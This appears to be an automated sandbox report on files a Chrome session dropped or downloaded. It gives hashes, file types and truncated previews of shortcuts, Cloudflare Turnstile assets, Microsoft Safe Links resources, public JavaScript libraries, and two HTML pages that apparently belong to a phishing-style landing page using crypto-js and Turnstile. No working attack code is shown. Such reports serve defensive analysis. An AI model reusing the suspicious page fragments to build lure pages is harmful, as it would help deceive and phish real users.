                                  Preview:L..................F.@.. ...$+.,......,....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VGY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1e......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2689
                                  Entropy (8bit):4.007807904975376
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:D97E3192FEBD463AB2E6C1B90D7974D0
                                  SHA1:27A91C9CB4FEF3762861D5A62EBA2EC8039425BC
                                  SHA-256:64458571DEA59587F817F0C968E1D3AFDE1DFDD07E3B6DB7A2BC3732D9882FB4
                                  SHA-512:333CBC3D64B61BB41EB5AADFBCA55EB11D5BF441EA63D5FDACD3453E9B23ECF7AD7A23A5F42755693C0D8DA22C1D49A10E6DB877DE55A3B177D277A9B7BDAF45
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1e......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 18:29:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2677
                                  Entropy (8bit):3.9990381428820005
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:FB49402D077453F9D23CA498CAC26713
                                  SHA1:2930060797F2DDA70C3D3B881B725210446B53FB
                                  SHA-256:7C0C98618326176F145BF88B8A8A287B1AF7CDDD0DAEDD3A8AB4AC6C37FD0CE6
                                  SHA-512:2D536C4A6AAC52AB0E7C25F04FA2C3986D3058BA45EC02A745AADFA91018A14D3DC483D94562DA3362DACD828BF04047326DA08C4ED2170BBC616E83CBFE9D9E
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,....w..,....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VGY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1e......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 18:29:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2677
                                  Entropy (8bit):3.9837055158730355
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:C81ECB351DA67A925225BB56972816CB
                                  SHA1:3618297D2442E8A7A18D792335ACBA9E166C4E27
                                  SHA-256:1BDC5ECCB39F90848DDFFBE73C266B8F697BF6E485F6F47C2E165DB07F876F4A
                                  SHA-512:96CDA5C5DB3A2B31970E431AC9670CA94C65170D71C1097084CFF0DF5BE8E53E272D6416175F9985FB14B8AFCC9C3AC57B97643212421E95C91FF185177EEA27
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,....Io.,....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VGY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1e......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 18:29:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2679
                                  Entropy (8bit):3.9960976188975263
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:A07A1CA471A93AEEC3D5351E8D0C244F
                                  SHA1:B886692B37BF7C8EBC9FA71B747840C638BF5E02
                                  SHA-256:81FB5D8DC6F39C86D0E05EDF063143A347984C467F11142CECA47563B293CF5A
                                  SHA-512:AB4DB616995A977A275266EDFDFFDD7E6393DDE006737EB6748765E894B49FDC7D2525BD2960257E825A4E7A036D906F3805A672143D06319F97DC06E6B47F61
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,.......,....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VGY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1e......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 47 x 82, 8-bit/color RGB, non-interlaced
                                  Category:downloaded
                                  Size (bytes):61
                                  Entropy (8bit):4.002585360278504
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:D5F4D0F9850F6C5392A274F11A078002
                                  SHA1:64C3B431D859A5B204DF58A640D006B81A08C091
                                  SHA-256:14E341B4F85D92265B0CD955E40E85A770B7B40B651F2EB9634503628F981357
                                  SHA-512:704BF0BECF63DBF8BB10A259712BD78A8E2ECFF8E25D7877C8A4B8332FB37478B54D6E348C87985FE476E4603E5791369F484F18089E42AF9F9E4BE0623A68CA
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cf04cd7cc87184d/1728329370161/9GpYtqJEPUuaOWi
                                  Preview:.PNG........IHDR.../...R.....K.......IDAT.....$.....IEND.B`.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text
                                  Category:downloaded
                                  Size (bytes):223
                                  Entropy (8bit):5.220159273079541
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:AF2012EDB18849798E8F785E26A51840
                                  SHA1:F0690F5502C212F1F550DB3F3AE66B55E2B3F394
                                  SHA-256:A12CD298C5BD7A9571F2A2C310943E5705A5CBBAE20FEF104A3BA0103D0646F6
                                  SHA-512:F45AEE90CF5F16147661727D05D885C44111856473534D37E7942B67359FAD73C828C4682D3F6E3F905E91BA723D16645F65853E137D8D9E647AFF8980C1D4CE
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://statics.teams.cdn.office.net/favicon.ico
                                  Preview:.<?xml version="1.0" encoding="utf-8"?><Error><Code>ResourceNotFound</Code><Message>The specified resource does not exist..RequestId:99f3ffa2-601e-003e-7fee-188587000000.Time:2024-10-07T19:27:20.2327458Z</Message></Error>
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                  Category:downloaded
                                  Size (bytes):4865
                                  Entropy (8bit):4.399535234096288
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:FCFAAA28269FCF6B9E8BEE41528FE071
                                  SHA1:A791C93BDB14FB31A5734590D11BB70765919CE5
                                  SHA-256:4B42CBE6A8DDD05D3B88EB9C83582DB83EC26138F8C4D0E98BE5C620C5BA3694
                                  SHA-512:90E569BA2528BD7ED0BC051B464D6AC03783E253D80313497762547740070F9981A0EC68303972283E5E3DF9C9F61D3CD1F2C482C8587B9D7776C345CD1AFD36
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/b+bdu++nua++wivprdd+m.html
                                  Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <title></title>.. <meta content="no-cache, no-store, must-revalidate" http-equiv="Cache-Control" />.. <meta content="no-cache" http-equiv="Pragma" />.. <meta content="0" http-equiv="Expires" />.. <meta charset="utf-8" />.. <meta content="IE=edge" http-equiv="X-UA-Compatible" />.. <meta content="width=device-width, initial-scale=1.0" name="viewport" />.. <meta content="width=device-width, initial-scale=1" name="viewport" />.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script>.. <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" />.. <script src="https://cdnjs.cloudflare.com/ajax/libs/URI.js/1.19.11/URI.min.js" integrity="sha512-HBrZaiSIpZkFPGkutbgouEKsfM+HCrfyioscGYbNPPWb7kvM
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                  Category:downloaded
                                  Size (bytes):2200
                                  Entropy (8bit):4.930898876402194
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:3AC5623517E7A1A46F8F1B9AC7E370E1
                                  SHA1:2AD4EB69E77D779E20B510588D6975792F0A0701
                                  SHA-256:2A28065D2A780E1E9C240A26222F6202F2BCB540BDFF52042AD5028B5AB4E884
                                  SHA-512:9FCBF4432E1EF1B2B144AC1D39331BA54F366C1883714C0A513433CFFFC3DA9BEE4B9A38A4DE5495218193885DCBFDFB66A5106673907498B69E0D7948BE999C
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp.css?v=3
                                  Preview:.html {.. font-size: calc(1em*.625);.. -webkit-tap-highlight-color: rgba(0, 0, 0, 0);..}....body {.. font-family: "Segoe UI", "Helvetica Neue", Helvetica, Arial, sans-serif;.. font-size: 1.4rem;.. line-height: 1.4285;.. overflow-y: auto;.. text-align: center;..}.....atp-content {.. display: flex;.. flex-direction: column;.. align-items: center;.. justify-content: center;.. text-align: center;.. height: calc(100vh - 100px);.. width: 100%;..}.....atp-button {.. height: 32px;.. border: 1px solid #E1DFDD;.. box-sizing: border-box;.. box-shadow: 0px 2px 4px rgba(0, 0, 0, 0.1);.. border-radius: 2px;.. font-size: 14px;.. line-height: 20px;.. text-align: center;.. padding: 5px 20px 7px 20px;.. cursor: pointer;.. font-weight: 600;.. font-family: "Segoe UI", "Helvetica Neue", Helvetica, Arial, sans-serif;..}.... .atp-button:active,.. .atp-button:focus {.. box-shadow: none;.. outline: 0;.. }....#atp-message {.. display: block;.. font-size: 24px;.. line-heig
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                  Category:downloaded
                                  Size (bytes):6766
                                  Entropy (8bit):5.049260376901189
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:54C53A8F68EF0EB696AFCDFE3986E626
                                  SHA1:31E7A1649FA193434F506DE131D06D9FFC869424
                                  SHA-256:99FDDE78DCF98B4A27ABD35E42EB8097017794E06E3195C541B0F57BD6E6EE8F
                                  SHA-512:41D8E5A08CEFFBCAB47A60EFFCA19ECB7C16C27D580A2BA6E55B1C2A62F96B2D0CEA51428A0F89FFD618157DAEA7E5A5AEF6F1D97BDF9133A5F64C412A53C9DF
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp.js?v=11
                                  Preview:.(function (w) {.. w.URLSearchParams = w.URLSearchParams || function (searchString) {.. var self = this;.. self.searchString = searchString;.. self.get = function (name) {.. var results = new RegExp('[\?&]' + name + '=([^&#]*)').exec(self.searchString);.. if (results === null) {.. return null;.. }.. else {.. return decodeURIComponent(results[1]) || 0;.. }.. };.. };..})(window);....// Checks that the url is using one of the allowed protocols..function isAllowedHrefProtocol(url) {.. const allowedHrefProtocols = ["http", "https", "ftp", "ftps"];.. // url.protocol contains ":".. const protocol = new URL(url).protocol.slice(0, -1);.. return allowedHrefProtocols.indexOf(protocol) > -1;..};....const queryString = window.location.search;..const urlParams = new URLSearchParams(queryString);..const url = urlParams.get("url");..const policycookie = urlParams.get("pc");..con
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                  Category:downloaded
                                  Size (bytes):61
                                  Entropy (8bit):3.990210155325004
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (47261)
                                  Category:downloaded
                                  Size (bytes):47262
                                  Entropy (8bit):5.3974731018213795
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                  SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                  SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                  SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js
                                  Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3354), with CRLF, LF line terminators
                                  Category:dropped
                                  Size (bytes):6657
                                  Entropy (8bit):5.612785306360996
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:D58C393E42D5A490DA7155234AF3772A
                                  SHA1:92EDC77BC84C127FA29B4919C4886BB14FCB3F58
                                  SHA-256:54D3F23663BD22475088FD4E36E439723786B7B5C16A648610804206FCDC22B7
                                  SHA-512:396290BA617B73F6FC768B75F45F15B9B759C91BA8CEAD0BFF60FBFC4CC4AD68397F508AC10EF921400E14200BA9B862FE80C1E418DA8BB1BC493386C886397E
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:<html>.. <head>.... <meta ..name="viewport" content="width=device-width, .initial-scale=1.0">.... <meta.name="robots".content="noindex, nofollow">....<script.. src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js">.</script>...<script. src="https://challenges.cloudflare.com/turnstile/v0/api.js"> .</script>... .<style>....body. .,.html { .height:.100%;margin: 0;display:..flex;align-items: center;justify-content:...center.} @keyframes .bounce. { 0% ,. .100% , . 12.5% ,..32.5%., 76.1% { .transform: translateY(0). } .22.5%. ., 86%.{.transform:.translateY(7px). .} } #nail. {.height: .179px;width:. 130px;overflow: .hidden;margin-top:.-59px;margin-left:. 25px. }.@keyframes..shadow-fade. .{.0%.. ,.100%., . 21.2%. ., 80% .{ .opacity: .0 }.47% ,.70% {.. opacity: 1 } . } #jaded .{. width:...130px;margin-top:. 179px.} .#vacillation..{ width:.130px;height:...71px;border-radius: .0.. 0 7px 7px;overflow: hidden;margin-top: -41px . } ..#vacillation. .>. .
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:SVG Scalable Vector Graphics image
                                  Category:downloaded
                                  Size (bytes):2606
                                  Entropy (8bit):5.174794763094625
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:5872E677136860EF037F817338C0BCDD
                                  SHA1:8C172A5C96E934061FEEADD0E1F18EB53AFD349C
                                  SHA-256:A1019D92C2A4DE6B952563887F6A6710E93C9AE219E7D9BD7C377EBB8CA2CAF1
                                  SHA-512:94CD40E707D37126E861D78C87E64BB9223A6938C8381EA06E430F86504DB58C914E6E4151E37613D806227E596B97BC751C04C1CA836FDA49D9C4A19A6DCC85
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://statics.teams.cdn.office.net/evergreen-assets/safelinks/assets/1/Unable_check_Saftey_Link.svg
                                  Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 24.1.2, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 217.5424 171.0022" enable-background="new 0 0 217.5424 171.0022" xml:space="preserve">..<g>...<path opacity="0.8" fill="#E1DFDD" d="M187.0025,130.7213L23.2667,151.833c-4.0315,0.5198-7.7211-2.327-8.2409-6.3585....L0.0612,29.4139c-0.5198-4.0315,2.327-7.7211,6.3585-8.2409L170.1555,0.0612c4.0315-0.5198,7.7211,2.327,8.2409,6.3585....l14.9646,116.0607C193.8808,126.5119,191.034,130.2014,187.0025,130.7213z"/>...<path fill="#E1DFDD" d="M21.5965,143.6835v8.174l12.0358,1.2462c0,0,2.106-10.7577,1.5201-10.7577....C34.5665,142.346,21.5965,143.6835,21.5965,143.6835z"/>...<g>....<path fill="#FFFFFF" d="M199.786,153.187l-165.0912,0c-4.0649,0-7.3601-3.2952-7.3601-7.3601l0-117.0215.....c0-4.0649,3.2952-7.3601,7.3601-7.3601l165.0912
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (47992), with no line terminators
                                  Category:downloaded
                                  Size (bytes):47992
                                  Entropy (8bit):5.605846858683577
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:CF3402D7483B127DED4069D651EA4A22
                                  SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                  SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                  SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (1158)
                                  Category:dropped
                                  Size (bytes):47616
                                  Entropy (8bit):5.486303751782396
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:1A2B6DFED7C245ACDF7D6B14852A7BBF
                                  SHA1:3C91498C1BD596739FA39C1293AF6166E21433A2
                                  SHA-256:0C44472A8334A85D6ADA7A05028D19CF8BAB7DB560E244E017258C317BBAC604
                                  SHA-512:1C1AD96A2488A599053C692EB5B828B842AC7CCF870AB7F28A8B1C1986CD3CF59BEE4BCC41C7CACCCA37E725DBF97F9E68E3B3A6EE94929A5C2577CA28EFD4A9
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:/*! URI.js v1.19.11 http://medialize.github.io/URI.js/ */./* build contains: IPv6.js, punycode.js, SecondLevelDomains.js, URI.js, URITemplate.js */.(function(r,x){"object"===typeof module&&module.exports?module.exports=x():"function"===typeof define&&define.amd?define(x):r.IPv6=x(r)})(this,function(r){var x=r&&r.IPv6;return{best:function(k){k=k.toLowerCase().split(":");var m=k.length,d=8;""===k[0]&&""===k[1]&&""===k[2]?(k.shift(),k.shift()):""===k[0]&&""===k[1]?k.shift():""===k[m-1]&&""===k[m-2]&&k.pop();m=k.length;-1!==k[m-1].indexOf(".")&&(d=7);var q;for(q=0;q<m&&""!==k[q];q++);if(q<d)for(k.splice(q,1,"0000");k.length<d;)k.splice(q,0,"0000");.for(q=0;q<d;q++){m=k[q].split("");for(var E=0;3>E;E++)if("0"===m[0]&&1<m.length)m.splice(0,1);else break;k[q]=m.join("")}m=-1;var A=E=0,h=-1,p=!1;for(q=0;q<d;q++)p?"0"===k[q]?A+=1:(p=!1,A>E&&(m=h,E=A)):"0"===k[q]&&(p=!0,h=q,A=1);A>E&&(m=h,E=A);1<E&&k.splice(m,E,"");m=k.length;d="";""===k[0]&&(d=":");for(q=0;q<m;q++){d+=k[q];if(q===m-1)break;d+="
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                  Category:downloaded
                                  Size (bytes):17456
                                  Entropy (8bit):5.930898240047304
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:44DAC65054245DCD471E4AAE9F6C8DEE
                                  SHA1:DD559EBF8FAB6312FCDD8AD5BB67E3009840DFD7
                                  SHA-256:0B11BFCF3E4D4CC4B891B66CBF24B3B6A98A12BBC8E5EBDF7CD08DAC84B53FD8
                                  SHA-512:94231FEB103C32E77E22A237239CE49329FF9407A337514EDD60B8349A9B758778A7B23380F5FAD230B4D22884A6386122A78FAEA698FB87E4E297DBFEE20CF7
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-i18n.js?v=3
                                  Preview:.// change to zh-hk, zh-cn, zh-tw to match the locale get from client..// make all lower case: 'sr-cyrl''sr-latn'..const ValidatingUrl = {.. af: "Verifi.ring van skakel",.. ar: "...... .. ........",.. az: "Ke.id yoxlan.l.r",.. bn: "........ ..... ... .....",.. bs: "Verifikacija veze",.. bg: "............. .. ........",.. "zh-hk": "....",.. ca: "Verificant l'enlla.",.. "zh-cn": "....",.. "zh-tw": "....",.. hr: "Provjera veze",.. cs: "Ov..en. odkazu",.. da: "Bekr.fter link",.. nl: "Koppeling verifi.ren",.. en: "Verifying link",.. et: "Lingi kontrollimine",.. eu: "Esteka egiaztatzen",.. fj: "Isema ni",.. fil: "Nagpapatunay ng link",.. fi: "Tarkistetaan linkki.",.. fr: "V.rification du lien",.. gl: "Verificando a ligaz.n",.. de: ".berpr.fen des Links",.. el: ".......... ........",.. ht: "Verifye lyen",.. he: "..... ...
